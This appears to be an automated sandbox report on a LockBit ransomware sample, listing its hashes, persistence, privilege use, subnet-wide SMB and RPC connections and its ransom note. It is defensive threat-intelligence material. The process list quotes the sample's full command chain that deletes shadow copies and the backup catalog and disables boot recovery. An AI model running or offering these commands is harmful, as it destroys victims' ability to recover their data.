Malware Analysis Report

2024-11-30 11:30

Sample ID 240228-v5bf2shh5t
Target 2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit
SHA256 3a46534271954db3df6dcc13b13fc69c7f7cc95c0a6f59b46778299c4168c658
Tags lockbit evasion persistence ransomware
Score 10/10

Analysis Overview

Threat Level: Known bad

The file 2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit was found to be: Known bad.

Malicious Activity Summary

lockbit evasion persistence ransomware

Lockbit

Renames multiple (15610) files with added filename extension

Modifies boot configuration data using bcdedit

Deletes shadow copies

Deletes backup catalog

Enumerates connected drives

Adds Run key to start application

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in Program Files directory

Unsigned PE

Enumerates physical storage devices

Uses Volume Shadow Copy service COM API

Suspicious use of WriteProcessMemory

Checks SCSI registry key(s)

Suspicious behavior: EnumeratesProcesses

Interacts with shadow copies

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Analysis: static1

Detonation Overview

Reported

2024-02-28 17:33

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-02-28 17:33

Reported

2024-02-28 17:39

Platform

win11-20240221-en

Max time kernel

270s

Max time network

285s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe"

Signatures

Lockbit

ransomware lockbit

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Renames multiple (15610) files with added filename extension

ransomware

Deletes backup catalog

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-627134735-902745853-4257352768-1000\Software\Microsoft\Windows\CurrentVersion\Run\XO1XADpO01 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe\"" C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A

Drops file in Program Files directory


Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Windows\System32\vds.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\System32\vds.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 C:\Windows\System32\vds.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\System32\vds.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbengine.exe N/A

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe

"C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet

C:\Windows\system32\wbengine.exe

"C:\Windows\system32\wbengine.exe"

C:\Windows\System32\vdsldr.exe

C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\System32\vds.exe

C:\Windows\System32\vds.exe

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 178.178.17.96.in-addr.arpa udp
N/A 10.127.0.166:445 tcp
N/A 10.127.0.168:445 tcp
N/A 10.127.0.169:445 tcp
N/A 10.127.0.170:445 tcp
N/A 10.127.0.171:445 tcp
N/A 10.127.0.172:445 tcp
N/A 10.127.0.173:445 tcp
N/A 10.127.0.174:445 tcp
N/A 10.127.0.176:445 tcp
N/A 10.127.0.175:445 tcp
N/A 10.127.0.178:445 tcp
N/A 10.127.0.177:445 tcp
N/A 10.127.0.179:445 tcp
N/A 10.127.0.180:445 tcp
N/A 10.127.0.181:445 tcp
N/A 10.127.0.182:445 tcp
N/A 10.127.0.183:445 tcp
N/A 10.127.0.184:445 tcp
N/A 10.127.0.187:445 tcp
N/A 10.127.0.185:445 tcp
N/A 10.127.0.186:445 tcp
N/A 10.127.0.188:445 tcp
N/A 10.127.0.189:445 tcp
N/A 10.127.0.190:445 tcp
N/A 10.127.0.192:445 tcp
N/A 10.127.0.191:445 tcp
N/A 10.127.0.193:445 tcp
N/A 10.127.0.194:445 tcp
N/A 10.127.0.195:445 tcp
N/A 10.127.0.197:445 tcp
N/A 10.127.0.196:445 tcp
N/A 10.127.0.198:445 tcp
N/A 10.127.0.199:445 tcp
N/A 10.127.0.200:445 tcp
N/A 10.127.0.201:445 tcp
N/A 10.127.0.202:445 tcp
N/A 10.127.0.203:445 tcp
N/A 10.127.0.204:445 tcp
N/A 10.127.0.205:445 tcp
N/A 10.127.0.206:445 tcp
N/A 10.127.0.207:445 tcp
N/A 10.127.0.209:445 tcp
N/A 10.127.0.210:445 tcp
N/A 10.127.0.208:445 tcp
N/A 10.127.0.211:445 tcp
N/A 10.127.0.212:445 tcp
N/A 10.127.0.213:445 tcp
N/A 10.127.0.214:445 tcp
N/A 10.127.0.215:445 tcp
N/A 10.127.0.216:445 tcp
N/A 10.127.0.218:445 tcp
N/A 10.127.0.217:445 tcp
N/A 10.127.0.219:445 tcp
N/A 10.127.0.220:445 tcp
N/A 10.127.0.221:445 tcp
N/A 10.127.0.222:445 tcp
N/A 10.127.0.223:445 tcp
N/A 10.127.0.224:445 tcp
N/A 10.127.0.226:445 tcp
N/A 10.127.0.225:445 tcp
N/A 10.127.0.227:445 tcp
N/A 10.127.0.228:445 tcp
N/A 10.127.0.229:445 tcp
N/A 10.127.0.230:445 tcp
N/A 10.127.0.231:445 tcp
N/A 10.127.0.232:445 tcp
N/A 10.127.0.233:445 tcp
N/A 10.127.0.234:445 tcp
N/A 10.127.0.235:445 tcp
N/A 10.127.0.236:445 tcp
N/A 10.127.0.237:445 tcp
N/A 10.127.0.238:445 tcp
N/A 10.127.0.240:445 tcp
N/A 10.127.0.239:445 tcp
N/A 10.127.0.241:445 tcp
N/A 10.127.0.243:445 tcp
N/A 10.127.0.242:445 tcp
N/A 10.127.0.246:445 tcp
N/A 10.127.0.245:445 tcp
N/A 10.127.0.247:445 tcp
N/A 10.127.0.249:445 tcp
N/A 10.127.0.248:445 tcp
N/A 10.127.0.244:445 tcp
N/A 10.127.0.250:445 tcp
N/A 10.127.0.252:445 tcp
N/A 10.127.0.251:445 tcp
N/A 10.127.0.253:445 tcp
N/A 10.127.0.62:135 tcp
N/A 10.127.0.20:135 tcp
N/A 10.127.0.21:135 tcp
N/A 10.127.0.19:135 tcp
N/A 10.127.0.17:135 tcp
N/A 10.127.0.18:135 tcp
N/A 10.127.0.63:135 tcp
N/A 10.127.0.16:135 tcp
N/A 10.127.0.15:135 tcp
N/A 10.127.0.14:135 tcp
N/A 10.127.0.12:135 tcp
N/A 10.127.0.64:135 tcp
N/A 10.127.0.13:135 tcp
N/A 10.127.0.11:135 tcp
N/A 10.127.0.10:135 tcp
N/A 10.127.0.9:135 tcp
N/A 10.127.0.65:135 tcp
N/A 10.127.0.8:135 tcp
N/A 10.127.0.6:135 tcp
N/A 10.127.0.7:135 tcp
N/A 10.127.0.5:135 tcp
N/A 10.127.0.4:135 tcp
N/A 10.127.0.66:135 tcp
N/A 10.127.0.254:135 tcp
N/A 10.127.0.23:135 tcp
N/A 10.127.0.22:135 tcp
N/A 10.127.0.24:135 tcp
N/A 10.127.0.61:135 tcp
N/A 10.127.0.25:135 tcp
N/A 10.127.0.26:135 tcp
N/A 10.127.0.60:135 tcp
N/A 10.127.0.27:135 tcp
N/A 10.127.0.28:135 tcp
N/A 10.127.0.29:135 tcp
N/A 10.127.0.30:135 tcp
N/A 10.127.0.31:135 tcp
N/A 10.127.0.59:135 tcp
N/A 10.127.0.32:135 tcp
N/A 10.127.0.33:135 tcp
N/A 10.127.0.34:135 tcp
N/A 10.127.0.35:135 tcp
N/A 10.127.0.58:135 tcp
N/A 10.127.0.36:135 tcp
N/A 10.127.0.37:135 tcp
N/A 10.127.0.57:135 tcp
N/A 10.127.0.39:135 tcp
N/A 10.127.0.38:135 tcp
N/A 10.127.0.40:135 tcp
N/A 10.127.0.41:135 tcp
N/A 10.127.0.42:135 tcp
N/A 10.127.0.56:135 tcp
N/A 10.127.0.44:135 tcp
N/A 10.127.0.43:135 tcp
N/A 10.127.0.45:135 tcp
N/A 10.127.0.46:135 tcp
N/A 10.127.0.55:135 tcp
N/A 10.127.0.48:135 tcp
N/A 10.127.0.47:135 tcp
N/A 10.127.0.54:135 tcp
N/A 10.127.0.49:135 tcp
N/A 10.127.0.50:135 tcp
N/A 10.127.0.51:135 tcp
N/A 10.127.0.69:135 tcp
N/A 10.127.0.52:135 tcp
N/A 10.127.0.71:135 tcp
N/A 10.127.0.70:135 tcp
N/A 10.127.0.72:135 tcp
N/A 10.127.0.73:135 tcp
N/A 10.127.0.74:135 tcp
N/A 10.127.0.75:135 tcp
N/A 10.127.0.76:135 tcp
N/A 10.127.0.77:135 tcp
N/A 10.127.0.79:135 tcp
N/A 10.127.0.78:135 tcp
N/A 10.127.0.81:135 tcp
N/A 10.127.0.82:135 tcp
N/A 10.127.0.83:135 tcp
N/A 10.127.0.84:135 tcp
N/A 10.127.0.85:135 tcp
N/A 10.127.0.86:135 tcp
N/A 10.127.0.87:135 tcp
N/A 10.127.0.88:135 tcp
N/A 10.127.0.90:135 tcp
N/A 10.127.0.89:135 tcp
N/A 10.127.0.91:135 tcp
N/A 10.127.0.93:135 tcp
N/A 10.127.0.92:135 tcp
N/A 10.127.0.94:135 tcp
N/A 10.127.0.241:135 tcp
N/A 10.127.0.239:135 tcp
N/A 10.127.0.240:135 tcp
N/A 10.127.0.238:135 tcp
N/A 10.127.0.237:135 tcp
N/A 10.127.0.236:135 tcp
N/A 10.127.0.235:135 tcp
N/A 10.127.0.234:135 tcp
N/A 10.127.0.233:135 tcp
N/A 10.127.0.232:135 tcp
N/A 10.127.0.231:135 tcp
N/A 10.127.0.229:135 tcp
N/A 10.127.0.230:135 tcp
N/A 10.127.0.228:135 tcp
N/A 10.127.0.227:135 tcp
N/A 10.127.0.225:135 tcp
N/A 10.127.0.226:135 tcp
N/A 10.127.0.223:135 tcp
N/A 10.127.0.224:135 tcp
N/A 10.127.0.221:135 tcp
N/A 10.127.0.222:135 tcp
N/A 10.127.0.219:135 tcp
N/A 10.127.0.220:135 tcp
N/A 10.127.0.217:135 tcp
N/A 10.127.0.218:135 tcp
N/A 10.127.0.215:135 tcp
N/A 10.127.0.216:135 tcp
N/A 10.127.0.213:135 tcp
N/A 10.127.0.214:135 tcp
N/A 10.127.0.211:135 tcp
N/A 10.127.0.212:135 tcp
N/A 10.127.0.208:135 tcp
N/A 10.127.0.210:135 tcp
N/A 10.127.0.207:135 tcp
N/A 10.127.0.209:135 tcp
N/A 10.127.0.206:135 tcp
N/A 10.127.0.205:135 tcp
N/A 10.127.0.204:135 tcp
N/A 10.127.0.202:135 tcp
N/A 10.127.0.203:135 tcp
N/A 10.127.0.201:135 tcp
N/A 10.127.0.200:135 tcp
N/A 10.127.0.199:135 tcp
N/A 10.127.0.198:135 tcp
N/A 10.127.0.196:135 tcp
N/A 10.127.0.197:135 tcp
N/A 10.127.0.195:135 tcp
N/A 10.127.0.193:135 tcp
N/A 10.127.0.194:135 tcp
N/A 10.127.0.191:135 tcp
N/A 10.127.0.190:135 tcp
N/A 10.127.0.192:135 tcp
N/A 10.127.0.189:135 tcp
N/A 10.127.0.188:135 tcp
N/A 10.127.0.186:135 tcp
N/A 10.127.0.185:135 tcp
N/A 10.127.0.187:135 tcp
N/A 10.127.0.183:135 tcp
N/A 10.127.0.184:135 tcp
N/A 10.127.0.181:135 tcp
N/A 10.127.0.182:135 tcp
N/A 10.127.0.180:135 tcp
N/A 10.127.0.179:135 tcp
N/A 10.127.0.177:135 tcp
N/A 10.127.0.178:135 tcp
N/A 10.127.0.176:135 tcp
N/A 10.127.0.174:135 tcp
N/A 10.127.0.171:135 tcp
N/A 10.127.0.116:135 tcp
N/A 10.127.0.97:135 tcp
N/A 10.127.0.99:135 tcp
N/A 10.127.0.98:135 tcp
N/A 10.127.0.100:135 tcp
N/A 10.127.0.101:135 tcp
N/A 10.127.0.103:135 tcp
N/A 10.127.0.104:135 tcp
N/A 10.127.0.105:135 tcp
N/A 10.127.0.102:135 tcp
N/A 10.127.0.107:135 tcp
N/A 10.127.0.108:135 tcp
N/A 10.127.0.131:135 tcp
N/A 10.127.0.106:135 tcp
N/A 10.127.0.110:135 tcp
N/A 10.127.0.111:135 tcp
N/A 10.127.0.109:135 tcp
N/A 10.127.0.113:135 tcp
N/A 10.127.0.112:135 tcp
N/A 10.127.0.119:135 tcp
N/A 10.127.0.115:135 tcp
N/A 10.127.0.118:135 tcp
N/A 10.127.0.117:135 tcp
N/A 10.127.0.120:135 tcp
N/A 10.127.0.114:135 tcp
N/A 10.127.0.122:135 tcp
N/A 10.127.0.124:135 tcp
N/A 10.127.0.123:135 tcp
N/A 10.127.0.121:135 tcp
N/A 10.127.0.126:135 tcp
N/A 10.127.0.127:135 tcp
N/A 10.127.0.125:135 tcp
N/A 10.127.0.128:135 tcp
N/A 10.127.0.129:135 tcp
N/A 10.127.0.134:135 tcp
N/A 10.127.0.130:135 tcp
N/A 10.127.0.132:135 tcp
N/A 10.127.0.133:135 tcp
N/A 10.127.0.136:135 tcp
N/A 10.127.0.138:135 tcp
N/A 10.127.0.137:135 tcp
N/A 10.127.0.135:135 tcp
N/A 10.127.0.139:135 tcp
N/A 10.127.0.141:135 tcp
N/A 10.127.0.140:135 tcp
N/A 10.127.0.143:135 tcp
N/A 10.127.0.142:135 tcp
N/A 10.127.0.144:135 tcp
N/A 10.127.0.149:135 tcp
N/A 10.127.0.145:135 tcp
N/A 10.127.0.147:135 tcp
N/A 10.127.0.146:135 tcp
N/A 10.127.0.150:135 tcp
N/A 10.127.0.148:135 tcp
N/A 10.127.0.151:135 tcp
N/A 10.127.0.152:135 tcp
N/A 10.127.0.154:135 tcp
N/A 10.127.0.156:135 tcp
N/A 10.127.0.153:135 tcp
N/A 10.127.0.157:135 tcp
N/A 10.127.0.155:135 tcp
N/A 10.127.0.158:135 tcp
N/A 10.127.0.160:135 tcp
N/A 10.127.0.159:135 tcp
N/A 10.127.0.161:135 tcp
N/A 10.127.0.162:135 tcp
N/A 10.127.0.164:135 tcp
N/A 10.127.0.163:135 tcp
N/A 10.127.0.166:135 tcp
N/A 10.127.0.167:135 tcp
N/A 10.127.0.165:135 tcp
N/A 10.127.0.168:135 tcp
N/A 10.127.0.169:135 tcp
N/A 10.127.0.175:135 tcp
N/A 10.127.0.170:135 tcp
N/A 10.127.0.172:135 tcp
N/A 10.127.0.173:135 tcp
N/A 10.127.0.96:135 tcp
N/A 10.127.0.95:135 tcp
N/A 10.127.0.3:135 tcp
N/A 10.127.0.1:135 tcp
N/A 10.127.0.67:135 tcp
N/A 10.127.0.68:135 tcp
N/A 10.127.0.250:135 tcp
N/A 10.127.0.2:135 tcp
N/A 10.127.0.253:135 tcp
N/A 10.127.0.251:135 tcp
N/A 10.127.0.244:135 tcp
N/A 10.127.0.252:135 tcp
N/A 10.127.0.248:135 tcp
N/A 10.127.0.247:135 tcp
N/A 10.127.0.243:135 tcp
N/A 10.127.0.245:135 tcp
N/A 10.127.0.249:135 tcp
N/A 10.127.0.246:135 tcp
N/A 10.127.0.242:135 tcp
N/A 10.127.0.53:135 tcp
N/A 10.127.0.0:135 tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

C:\Program Files\dotnet\Restore-My-Files.txt

MD5 d0aa323040e7474531aa19207ab6de45
SHA1 6dda92e3a4b48f80ad85d37f8e6b551d82f12dbd
SHA256 0f33daf218df6d70a46311fe6cf9e37e6b7d77ee59cd96aced7a1e3ad7d54bfb
SHA512 fde95408a1cc62e021a09d748a6a784b6b40eb2efdf71359186df3f201d990e8861362335d5181541131b998e7df8da028afc0b144688256450cfffe8c518b2c